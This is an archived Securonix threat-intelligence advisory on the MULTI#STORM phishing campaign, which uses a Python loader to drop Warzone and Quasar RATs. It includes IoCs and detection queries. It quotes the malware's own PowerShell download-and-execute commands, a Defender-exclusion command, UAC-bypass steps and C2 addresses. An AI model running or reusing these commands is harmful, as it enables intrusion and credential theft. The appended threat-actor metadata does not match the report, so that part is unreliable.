{
	"id": "b3bc3b9b-8112-4e45-95c3-e80ec5a51f66",
	"created_at": "2026-04-06T00:17:35.127724Z",
	"updated_at": "2026-04-10T03:36:48.330932Z",
	"deleted_at": null,
	"sha1_hash": "2059e9884e9b1c429b5ccd41ceefebc54f06d683",
	"title": "Securonix Threat Labs Security Advisory: New MULTI#STORM Attack Campaign Involving Python-based Loader Masquerading as OneDrive Utilities Dropping Multiple RAT Payloads Using Security Analytics",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 18302679,
	"plain_text": "Securonix Threat Labs Security Advisory: New MULTI#STORM Attack\r\nCampaign Involving Python-based Loader Masquerading as OneDrive\r\nUtilities Dropping Multiple RAT Payloads Using Security Analytics\r\nArchived: 2026-04-05 18:28:06 UTC\r\nBy Securonix Threat Labs, Threat Research: D. Iuzvyk, T. Peck, O. Kolesnikov\r\nJune 21, 2023\r\nTL;DR\r\nMULTI#STORM, an interesting attack campaign involving Python-based loader malware was recently seen being used to\r\ndeliver Warzone RAT infections using phishing emails.\r\nAn interesting phishing campaign was recently analyzed by the Securonix Threat Research Team. The attack kicks off when\r\nthe user clicks on a heavily obfuscated JavaScript file contained in a password protected zip file. Some of the victims\r\ntargeted by the MULTI#STORM campaign appear to be in the US and India.\r\nThe attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances,\r\nsuch as Warzone RAT and Quasar RAT. Both are used for command and control during different stages of the infection\r\nchain.\r\nThe loader which is responsible for the initial compromise of the host is rather interesting. It functions very similarly to\r\nDBatLoader which shares common TTPs, however this malware is coded in Python and packed using PyInstaller and\r\nleverages some rather sophisticated techniques to establish persistence and bypass detections before dropping the RAT\r\npayloads.\r\nAttack chain overview\r\nhttps://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/\r\nPage 1 of 13\n\nFigure 1: MULTI#STORM attack chain\r\nThe attack kicks off like so many others, with a phishing email which has an embedded link. 
The link references a request for quote which directs the user to a Microsoft OneDrive file to download:\r\nhxxps://onedrive.live[.]com/download?cid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D!152\u0026authkey=AErksvWpjzpD_Ag\r\nIn this example, the OneDrive link downloads a ~500KB password-protected zip file called “REQUEST.zip” with the password “12345”.\r\nWhen the zip file is extracted, the target user is presented with a single JScript file named REQUEST.js. It’s surprising that there was no attempt to disguise the file by using .LNK execution, or at the very least a double extension to masquerade as a different file type.\r\nCode execution: JScript\r\nAssuming that the user double clicks the REQUEST.js file, this is where code execution begins. The JScript file’s code is heavily obfuscated, as seen in the figure below.\r\nFigure 2: Obfuscated JScript sample (REQUEST.js)\r\nIn addition to the obfuscation, the JS file also contains a massive amount of padding at the end of the script: exactly 509992 zero characters.\r\n
This technique can assist in bypassing AV scanning of the file, or it could be an attempt to inflate the original ZIP file’s size to thwart AV analysis or brute forcing.\r\nThe purpose of this script is to execute two PowerShell commands which download and execute two separate files from two different OneDrive URLs.\r\nOnce deobfuscated, we’re presented with two PowerShell one-liners, kicked off by cmd.exe:\r\ncmd /c powershell.exe -Command “Invoke-WebRequest -Uri ‘hxxps://onedrive.live[.]com/download?cid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21148\u0026authkey=ADY1aqOba7HnNZs\u0026em=2’ -OutFile ‘C:\\Users\\Public\\Libraries\\files.pdf’”\r\ncmd /c powershell.exe -Command “Invoke-WebRequest -Uri ‘hxxps://onedrive.live[.]com/download?cid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21151\u0026authkey=AGCMruhQJESxca4’ -OutFile ‘C:\\Users\\Public\\Libraries\\stemp’”\r\nThe two files are downloaded to the C:\\Users\\Public\\Libraries directory, a common staging area for malware because it is world-writable. Once downloaded, both files are executed almost simultaneously.\r\nThe first download is the lure file. It is opened purely so that the user sees the expected outcome of clicking the “request” and is not alerted that anything suspicious happened.\r\nFigure 3: Lure file (files.pdf)\r\nThe lure file is downloaded from OneDrive as spread.pdf and is saved to disk as files.pdf. It is simply executed, which opens it for the user in the default PDF reader.\r\nDropper: news.exe\r\nThe downloaded binary “stemp”, later renamed to “news.exe”, is a Python executable packed with PyInstaller.\r\n
As with any Windows Python executable, it’s quite large at 6.6MB.\r\nFigure 4: news.exe binary file overview (Detect It Easy)\r\nThe news.exe file acts as a loader or dropper. All of the further malware stages are packed inside the binary’s source and, as you’ll see, encoded as long Base64 blobs. These are decoded and written to disk, staged inside the “C:\\Users\\Public\\Libraries” directory.\r\nOnce we were able to extract the original Python source code, the functions of the dropper became a bit clearer. Interestingly, the dropper includes printed messages describing its progress as functions are called. An example of this can be seen in figure 5 below.\r\nFigure 5: Python source code example\r\nBased on our analysis, the news.exe dropper accomplishes the following tasks, sleeping between some of the steps:\r\n1. Drops the startup icon file into C:\\Users\\Public\\Libraries\\onedrive.ico\r\n2. Drops and compiles a shortcut file into C:\\Users\\Public\\Libraries\\OneDrive\\Storm.lnk\r\n3. Creates a registry key for persistence which executes C:\\Users\\Public\\Libraries\\OneDrive.url (see persistence below)\r\n4. Runs a function which executes werfault.exe 40 times in a loop.\r\n5. Decodes a zip file from a Base64 string.\r\n6. Saves this zip file as C:\\Users\\Public\\Libraries\\files.zip and extracts its contents into C:\\Users\\Public\\Libraries\r\n7. Runs C:\\Users\\Public\\Libraries\\check.bat to set AV exclusions for bypassing AV (see below).\r\n8. Decodes “Storm.exe” from Base64.\r\n9. Creates C:\\Users\\Public\\Libraries\\OneDrive Update\\Exec.lnk, which is also used for persistence to execute Storm.exe.\r\nStorm.lnk\r\nAs noted above, the binary drops two shortcut (.lnk) files upon execution.\r\n
The first, “Storm.lnk”, when invoked through a startup registry key, downloads and executes “S.exe”. The shortcut points to the PowerShell process with the following appended command line:\r\nwget ‘hxxps://onedrive.live[.]com/download?cid=4A89E2A4EA0448C0\u0026resid=4A89E2A4EA0448C0%21130\u0026authkey=ABwx94zEGC3SmxA’ -Outfile C:\\Users\\Public\\Libraries\\S.exe; powershell C:\\Users\\Public\\Libraries\\S.exe\r\nFigure 6: Storm.lnk created by news.exe\r\nExec.lnk\r\nAdditionally, “Exec.lnk” is created in the same directory. Also used for persistence, this file simply runs “Storm.exe” from PowerShell using the “saps” alias of “Start-Process”.\r\nFigure 7: Exec.lnk created by news.exe\r\nFiles.zip\r\nAs with all of the other files generated by news.exe, this file is decoded from a Base64 blob, and its contents are extracted into the “C:\\Users\\Public\\Libraries” directory. The purpose of these files is simply to bypass UAC, which we’ll dive into in the next section.\r\nFigure 8: Files.zip contents\r\nCheck.bat and UAC bypass\r\nThe contents of Check.bat show that it uses a less common UAC bypass, the “Mock Trusted Directories” method, with the end goal of executing “KDECO.bat”.\r\nThe batch file is identical to one documented in SentinelOne’s analysis of DBatLoader. The two loaders share many TTPs; the main difference is that this loader is coded and compiled in Python, whereas DBatLoader is written in Delphi.\r\nFigure 9: check.bat code\r\nThis UAC bypass technique was first discovered back in 2020 by threat researcher Daniel Gebert.\r\n
It combines DLL hijacking with a mock trusted directory to execute a command or script without prompting the user for elevated permissions.\r\nThe script first creates a new directory structure masquerading as the System32 directory (notice the trailing space after “Windows”): C:\\Windows \\System32\r\nIt then copies the files “easinvoker.exe”, “netutils.dll”, and “KDECO.bat” into the newly created directory. “easinvoker.exe” is then executed to run “KDECO.bat” with elevated permissions.\r\nTo ensure that the command has time to execute, Check.bat silently pings the local IP six times, and then cleans up all of the created files and folders.\r\nKDECO.bat\r\nThe purpose of this file is to execute a single PowerShell command which instructs Windows Defender to add an AV exclusion for everything under the “C:\\Users” directory.\r\nstart /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command “Add-MpPreference -ExclusionPath ‘C:\\Users’” \u0026 exit\r\nDropper persistence methods\r\nThe news.exe binary establishes persistence on the host by creating two registry keys which execute upon startup.\r\nThe first registry key points to the decoded Base64 blob “Storm.exe”, which is called using “Exec.lnk”.\r\n
The registry key “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive Update” is created with a value of “C:\\Users\\Public\\Libraries\\OneDrive.url”. If you recall, the purpose of this file is simply to download and execute S.exe:\r\nwget ‘hxxps://onedrive.live[.]com/download?cid=4A89E2A4EA0448C0\u0026resid=4A89E2A4EA0448C0%21130\u0026authkey=ABwx94zEGC3SmxA’ -Outfile C:\\Users\\Public\\Libraries\\S.exe; powershell C:\\Users\\Public\\Libraries\\S.exe\r\nThe registry key “HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive Update File” is also created, pointing to C:\\Users\\Public\\Libraries\\OneDrive Update.url. This shortcut file simply executes Storm.exe using the following PowerShell command:\r\nsaps “C:\\Users\\Public\\Libraries\\Storm.exe”\r\nFigure 10: contents of OneDrive.url and OneDrive Update.url\r\nStorm.exe – Warzone RAT payload\r\nAt this stage, the loader malware has accomplished its goals: extracting the main RAT payload “Storm.exe”, inhibiting defenses by disabling AV inside the malware staging area, and maintaining persistence on the host.\r\nWarzone RAT, also known as Ave Maria, allows remote access to the infected host through stealthy connection strings and hidden processes. Warzone markets itself as malware-as-a-service (MaaS). Currently, it’s listed at $38 USD/month, which puts it in the REMCOS price range.\r\n
Warzone contains the following feature set:\r\nEncrypted C2 communication\r\nNative, independent stub (C++)\r\nCookies recovery\r\nRemote desktop\r\nHidden remote desktop – HRDP\r\nPrivilege escalation – UAC bypass\r\nRemote webcam\r\nPassword recovery\r\nFile manager\r\nDownload \u0026 execute\r\nLive/offline keylogger\r\nRemote shell\r\nProcess manager\r\nReverse proxy\r\nAutomatic tasks\r\nMass execute\r\nSmart updater\r\nHRDP WAN direct connection\r\nPersistence\r\nWindows Defender bypass\r\nStorm.exe is overall quite lightweight at only 113KB. Its execution begins inside the “C:\\Users\\Public” directory which, thanks to the Defender exclusion set up via the UAC bypass, should no longer trigger any AV alerts for malicious activity from within it.\r\nFigure 11: storm.exe binary file overview (Detect It Easy)\r\nBased on our analysis, the RAT contains many functions which line up with the advertised feature set. The credential theft functionality is quite robust.\r\n
It targets not only the traditional credentials stored in Windows or browsers, but also those of installed software such as Outlook, Foxmail, and Thunderbird, to name a few.\r\nBrowser data theft functionality and other registry queries used to steal credentials can be seen in a couple of the functions below:\r\nFigure 12: storm.exe – browser and software credentials\r\nDuring our static analysis of Storm.exe we observed the following details of Warzone RAT:\r\nFunctionality – Details/description\r\nOdd strings –\r\n  “Ave_Maria Stealer OpenSource github Link: hxxps://github[.]com/syohex/java-simple-mine-sweeper”\r\n  “C:\\\\Users\\\\Vitali Kremez\\\\Documents\\\\MidgetPorn\\\\workspace\\\\MsgBox.exe”\r\n  “?lst@@YAXHJ@Z”\r\n  “BQAaR$43!QAFff”\r\nExecution of “programs.bat” –\r\n  “for /F \\”usebackq tokens=*\\” %%A in (\\”\r\n  :ApplicationDat\r\nExecute application through WMIC (wmiprsrv.exe) –\r\n  “wmic process call create \\’\\”\r\nConnectivity check –\r\n  “cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 \u003e Nul \u0026 Del /f /q “\r\nAnother UAC bypass using sdclt –\r\n  Registry changes to “Software\\\\Classes\\\\Folder\\\\shell\\\\open\\\\command”\r\n  Run “%windir%\\system32\\sdclt.exe”\r\nExclude a chosen file or path from Windows Defender –\r\n  powershell Add-MpPreference -ExclusionPath “”\r\nSearch for files –\r\n  find.exe\r\n  “-w %ws -d C -f %s”\r\nIncrease maximum number of server connections –\r\n  Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Internet Settings\r\n  MaxConnectionsPer1_0Server\r\n  MaxConnectionsPerServer\r\nEnable remote connections through the Windows registry (keys accessed) –\r\n  “SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server”\r\n  “SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\Licensing Core\\EnableConcurrentSessions”\r\n  “SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\EnableConcurrentSessions”\r\n  “SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\AddIns”\r\n  “SYSTEM\\\\CurrentControlSet\\\\ControlTerminal Server\\\\AddIns\\\\Clip Redirector”\r\n  “SYSTEM\\\\CurrentControlSet\\\\Control\\\\Terminal Server\\\\AddIns\\\\Dynamic VC”\r\nChromium browser secrets decrypt –\r\n  os_crypt\\”:{\\”encrypted_key\\\r\nIE credential theft –\r\n  vaultcli.dll, “VaultOpenVault”, “VaultCloseVault”, “VaultEnumerateItems”, “VaultGetItem”, “VaultGetItem”, “VaultFree”\r\nMozilla browser credential theft –\r\n  “Softokn3.dll”,”msvcp140.dll”,”mozglue.dll,vcruntime140.dll,”freebl3.dll”,”nss3.dll”\r\n  “NSS_Init”,”PK11_GetInternalKeySlot”,”PK11_Authenticate”,”PK11SDR_Decrypt”,”NSSBase64_DecodeBuffer”,”PK11_CheckU\r\nSoftware credential scraping through Windows registry –\r\n  Software\\\\Microsoft\\\\Office\\\\15.0Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\r\n  Software\\\\Microsoft\\\\Office\\\\15.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A667\r\n  Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows Messaging Subsystem\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A0\r\n  Software\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Windows Messaging Subsystem\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A0\r\n  Software\\\\Microsoft\\\\Windows Messaging Subsystem\\\\Profiles\\\\9375CFF0413111d3B88A00104B2A6676\r\n  Software\\\\Microsoft\\\\Windows Messaging Subsystem\\\\Profiles\\\\9375CFF0413111d3B88A00104B2A667\r\n  Software\\\\Microsoft\\\\Office\\\\16.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\r\n  Software\\\\Microsoft\\\\Office\\\\16.0\\\\Outlook\\\\Profiles\\\\Outlook\\\\9375CFF0413111d3B88A00104B2A6676\r\nWhen it comes to browser data, this version of Warzone RAT attempts to extract cookies and credentials from the following browsers:\r\nGoogle Chrome\r\nEpic Privacy Browser\r\nMicrosoft Edge\r\nUCBrowser\r\nQQ Browser\r\nOpera\r\nBlisk\r\nChromium\r\nBrave browser\r\nVivaldi\r\nComodo\r\nTorch\r\nSlimjet\r\nCentBrowser\r\nMozilla Firefox\r\nPost exploitation analysis\r\nDuring our dynamic analysis of the entire attack chain, we were able to observe the attackers operating from behind the Warzone RAT payload. Two additional files, “euyjrxpgo6ua.bat” and “quas.exe”, were downloaded to “C:\\Users\\Public\\Libraries\\” from the URL 134[.]19.179.147:38046/dominion46.ddns[.]net.\r\nThe batch file contained the following code, which is used for OpSec purposes to clean up the two files:\r\n@echo off\r\nchcp\r\necho DONT CLOSE THIS WINDOW!\r\nping -n 10 localhost \u003e nul\r\ndel /a /q /f “C:\\Users\\Public\\Libraries\\Quas.exe”\r\ndel /a /q /f “C:\\Users\\[redacted]\\AppData\\Local\\Temp\\EuYJrxpgO6uA.bat”\r\nThe quas.exe binary is simply a compiled client of QuasarRAT, an open source “administration tool” which features many RAT-like capabilities and is flagged by almost every AV vendor.\r\nFigure 13: quas.exe VirusTotal analysis\r\nSince Quasar has been around for a while and is open source, we won’t be going deeper into this particular payload. Once QuasarRAT was executed by the attacker, we observed it connecting to the same IP, though on a different port: 134[.]19.179.147:29185/dominion46.ddns[.]net.\r\nC2 and infrastructure\r\nEarly in the attack chain, the Python-based loader malware used Microsoft OneDrive links to stage various payloads. The RAT connections took an interesting turn: they connect directly to an IP:port combination with a fake .ddns.net hostname appended.\r\n
This is likely an attempt to throw off NIDS-based detections.\r\nBelow is a list of all network-based connections used throughout the campaign:\r\nConnection IP/URL – Description\r\nhxxps://lo3kcg.bl.files.1drv[.]com/y4mtafF_tQM7vAFHxOASpTWOq0M5qmXCnd8FhdFvHvKOxYaA1h-ocJsybIp-r0iMVcK8UH6WP-fFspS6l-aP6uTlpsy11crZ_p_HfMxTI4yymzBqVkLX-v4nQLrn2Ty0-ilIRzICAbtwbooanM9U97qPmTgUNxhC9ab_4VfNvcmiWFeami9lwl35D8Eb7UiF7TCJTo_0XyAatlemjaXw9zAlw/REQUEST.zip?download\u0026psid=1 (redirects to hxxps://onedrive.live[.]com/download?cid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D!152\u0026authkey=AErksvWpjzpD_Ag) – Download phishing lure “REQUEST.zi\r\nhxxps://onedrive.live[.]com/download?cid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21151\u0026authkey=AGCMruhQJESxca4 – Download “news.exe”\r\nhxxps://onedrive.live[.]com/download?cid=D09BFD4EBDA21A3D\u0026resid=D09BFD4EBDA21A3D%21148\u0026authkey=ADY1aqOba7HnNZs\u0026em=2 – Download “files.pdf”\r\nhxxps://onedrive.live[.]com/download?cid=4A89E2A4EA0448C0\u0026resid=4A89E2A4EA0448C0%21130\u0026authkey=ABwx94zEGC3SmxA – Download “S.exe”\r\n134[.]19.179.147:38046/dominion46.ddns[.]net – Storm.exe connection string\r\n134[.]19.179.147:29185/dominion46.ddns[.]net – quas.exe connection string\r\nSecuronix recommendations and mitigations\r\nIt’s important to remain extra vigilant when it comes to phishing emails, especially when a sense of urgency is stressed. This particular lure was generally unremarkable, as it would require the user to execute a JavaScript file directly.\r\n
Shortcut files or files using double extensions would likely have a higher success rate.\r\nWhen it comes to prevention and detection, the Securonix Threat Research Team recommends:\r\nAvoid opening any attachments, especially unexpected ones or those from outside the organization; ZIP files in particular with regard to this campaign.\r\nImplement an application whitelisting policy to restrict the execution of unknown binaries.\r\nMonitor publicly writable directories such as any temp directory, “C:\\Users\\Public” or “C:\\ProgramData\\”, as these are typical areas used to stage malware.\r\nDeploy additional process-level logging such as Sysmon and PowerShell logging for additional log detection coverage.\r\nMonitor for the usage of OneDrive links, especially if OneDrive is not used by the organization.\r\nSecuronix customers can scan endpoints using the Securonix Seeder Hunting Queries below.\r\nMITRE ATT\u0026CK matrix\r\nTactic – Technique\r\nInitial Access\r\nT1566: Phishing\r\nT1566.001: Phishing: Spearphishing Attachment\r\nExecution\r\nT1204.002: User Execution: Malicious File\r\nT1059.001: Command and Scripting Interpreter: PowerShell\r\nT1059.007: Command and Scripting Interpreter: JavaScript\r\nDefense Evasion\r\nT1027.010: Obfuscated Files or Information: Command Obfuscation\r\nT1055.002: Process Injection: Portable Executable Injection\r\nPersistence\r\nT1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder\r\nT1053.005: Scheduled Task/Job: Scheduled Task\r\nCommand and Control\r\nT1573.001: Encrypted Channel: Symmetric Cryptography\r\nT1105: Ingress Tool Transfer\r\nT1571: Non-Standard Port\r\nExfiltration\r\nT1041: Exfiltration Over C2 Channel\r\nCollection\r\nT1056.001: Input Capture: Keylogging\r\nT1113: Screen Capture\r\nT1115: Clipboard Data\r\nT1119: Automated Collection\r\nAnalyzed file hashes\r\nFile Name – SHA256 (IoC)\r\nREQUEST.zip 8674817912be90a09c5a0840cd2dff2606027fe8843eb868929fc33935f5511e\r\nREQUEST.js 3783acc6600b0555dec5ee8d3cc4d59e07b5078dd33082c5da279a240e7c0e79\r\nnews.exe 18C876A24913EE8FC89A146EC6A6350CDC4F081AC93C0477FF8FC054CC507B75\r\nfiles.pdf 31960A45B069D62E951729E519E14DE9D7AF29CB4BB4FB8FEAD627174A07B425\r\nnetutils.dll 02212f763b2d19e96651613d88338c933ddfd18be4cb7e721b2fb57f55887d64\r\ncheck.bat 5A11C5641C476891AA30E7ECFA57C2639F6827D8640061F73E9AFEC0ADBBD7D2\r\neasinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96\r\nKDECO.bat 37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E\r\nExec.lnk F9130B4FC7052138A0E4DBAAEC385EF5FAE57522B5D61CB887B0327965CCC02A\r\nStorm.lnk 0E799B2F64CD9D10A4DFED1109394AC7B4CCC317A3C17A95D4B3565943213257\r\nOneDrive Update.url 455ED920D79F9270E8E236F14B13ED4E8DB8DD493D4DABB05756C867547D8BC7\r\nOneDrive.url 9C14375FBBCE08BCF3DC7F2F1100316B2FB745FA2C510F5503E07DB57499BFC8\r\nstorm.exe B452A2BA481E881D10A9741A452A3F092DFB87BA42D530484D7C3B475E04DA11\r\nS.exe AB0212F8790678E3F76ED90FBA5A455AC23FBB935CF99CABC2515A1D7277676F\r\nquas.exe 4A834B03E7FAFFEF929A2932D8E5A1839190DF4D5282CEF35DA4019FE84B19A5\r\neuyjrxpgo6ua.bat 11408368F4C25509C24017B9B68B19CE5278681F6F12CE7DB992D3C6124B0A23\r\nRelevant Securonix detection policies\r\nEDR-ALL-1212-RU\r\nEDR-ALL-1227-RU\r\nWEL-ALL-1194-RU\r\nWEL-ALL-1192-RU\r\nEDR-ALL-1228-RU\r\nEDR-ALL-1098-RU\r\nEDR-ALL-1120-RU\r\nEDR-ALL-941-RU\r\nEDR-ALL-993-RU\r\nRelevant Spotter queries\r\n(rg_functionality = “Next Generation Firewall” OR rg_functionality = “Web Application Firewall” OR rg_functionality = “ Proxy”) AND destinationaddress = “134[.]19.179.147”\r\nindex = activity AND rg_functionality = “Web Proxy” AND requesturl CONTAINS “onedrive.live[.]com” AND (requesturl CONTAINS “AErksvWpjzpD_Ag” OR requesturl CONTAINS “AGCMruhQJESxca4” OR requesturl CONTAINS “ADY1aqOba7HnNZs” OR requesturl CONTAINS “ABwx94zEGC3SmxA”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)” OR deviceaction = “ProcessRollup2” OR deviceaction = “Procstart” OR deviceaction = “Process” OR deviceaction = “Trace Executed Process”) AND (destinationprocessname = “ConfigSecurityPolicy.exe” OR filename = “ConfigSecurityPolicy.exe”) AND (resourcecustomfield1 CONTAINS “http://” OR resourcecustomfield1 CONTAINS “https://”)\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)”) AND sourceprocessname = “explorer.exe” AND resourcecustomfield1 CONTAINS “powershell” AND resourcecustomfield1 CONTAINS “.lnk ”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (deviceaction = “Process Create” OR deviceaction = “Process Create (rule: ProcessCreate)”) AND destinationprocessname STARTS WITH “C:\\Windows \\System32\\”\r\nindex = activity AND rg_functionality = “Endpoint Management Systems” AND (baseeventid = “12” OR baseeventid = “13” OR baseeventid = “14”) AND transactionstring5 = “SetValue” AND customstring47 CONTAINS “Classes\\Folder\\shell\\open\\command\\(Default)” AND (customstring48 CONTAINS “cmd.exe” OR customstring48 CONTAINS “powershell.exe”)\r\nReferences:\r\n1. Bypassing Windows 10 UAC with mock folders and DLL hijacking\r\nhttps://www.bleepingcomputer.com/news/security/bypassing-windows-10-uac-with-mock-folders-and-dll-hijacking/\r\n2. Yet another sdclt UAC bypass\r\nhttps://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\r\n3. Increasing simultaneous network connections to 10 for various applications\r\nhttps://social.technet.microsoft.com/Forums/ie/en-US/c95a72de-f7ba-4258-b179-da0ca4d9ca84/increasing-simultaneous-network-connections-to-10-for-various-applications?forum=ieitprocurrentver\r\n4. Decrypting Browser Passwords \u0026 Other “Secrets”\r\nhttps://www.alertra.com/blog/decrypting-browser-passwords-other-secrets\r\n5. The Secrets of Internet Explorer Credentials\r\nhttps://www.codeproject.com/Articles/1167943/The-Secrets-of-Internet-Explorer-Credentials\r\n6. The Secrets of Firefox Credentials\r\nhttps://www.codeproject.com/Articles/1167954/The-Secrets-of-Firefox-Credentials\r\n7. DBatLoader/ModLoader Analysis – First Stage\r\nhttps://zero2auto.com/2020/08/20/dbatloader-modiloader-first-stage/\r\nSource: https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.securonix.com/securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads/"
	],
	"report_names": [
		"securonix-threat-labs-security-advisory-multistorm-leverages-python-based-loader-as-onedrive-utilities-to-drop-rat-payloads"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7",
			"created_at": "2025-08-07T02:03:24.688416Z",
			"updated_at": "2026-04-10T02:00:03.734754Z",
			"deleted_at": null,
			"main_name": "BRONZE UNIVERSITY",
			"aliases": [
				"Aquatic Panda",
				"Aquatic Panda ",
				"CHROMIUM",
				"CHROMIUM ",
				"Charcoal Typhoon",
				"Charcoal Typhoon ",
				"Earth Lusca",
				"Earth Lusca ",
				"FISHMONGER ",
				"Red Dev 10",
				"Red Dev 10 ",
				"Red Scylla",
				"Red Scylla ",
				"RedHotel",
				"RedHotel ",
				"Tag-22",
				"Tag-22 "
			],
			"source_name": "Secureworks:BRONZE UNIVERSITY",
			"tools": [
				"Cobalt Strike",
				"Fishmaster",
				"FunnySwitch",
				"Spyder",
				"njRAT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "6abcc917-035c-4e9b-a53f-eaee636749c3",
			"created_at": "2022-10-25T16:07:23.565337Z",
			"updated_at": "2026-04-10T02:00:04.668393Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Bronze University",
				"Charcoal Typhoon",
				"Chromium",
				"G1006",
				"Red Dev 10",
				"Red Scylla"
			],
			"source_name": "ETDA:Earth Lusca",
			"tools": [
				"Agentemis",
				"AntSword",
				"BIOPASS",
				"BIOPASS RAT",
				"BadPotato",
				"Behinder",
				"BleDoor",
				"Cobalt Strike",
				"CobaltStrike",
				"Doraemon",
				"FRP",
				"Fast Reverse Proxy",
				"FunnySwitch",
				"HUC Port Banner Scanner",
				"KTLVdoor",
				"Mimikatz",
				"NBTscan",
				"POISONPLUG.SHADOW",
				"PipeMon",
				"RbDoor",
				"RibDoor",
				"RouterGod",
				"SAMRID",
				"ShadowPad Winnti",
				"SprySOCKS",
				"WinRAR",
				"Winnti",
				"XShellGhost",
				"cobeacon",
				"fscan",
				"lcx",
				"nbtscan"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "d53593c3-2819-4af3-bf16-0c39edc64920",
			"created_at": "2022-10-27T08:27:13.212301Z",
			"updated_at": "2026-04-10T02:00:05.272802Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"Earth Lusca",
				"TAG-22",
				"Charcoal Typhoon",
				"CHROMIUM",
				"ControlX"
			],
			"source_name": "MITRE:Earth Lusca",
			"tools": [
				"Mimikatz",
				"PowerSploit",
				"Tasklist",
				"certutil",
				"Cobalt Strike",
				"Winnti for Linux",
				"Nltest",
				"NBTscan",
				"ShadowPad"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434655,
	"ts_updated_at": 1775792208,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2059e9884e9b1c429b5ccd41ceefebc54f06d683.pdf",
		"text": "https://archive.orkl.eu/2059e9884e9b1c429b5ccd41ceefebc54f06d683.txt",
		"img": "https://archive.orkl.eu/2059e9884e9b1c429b5ccd41ceefebc54f06d683.jpg"
	}
}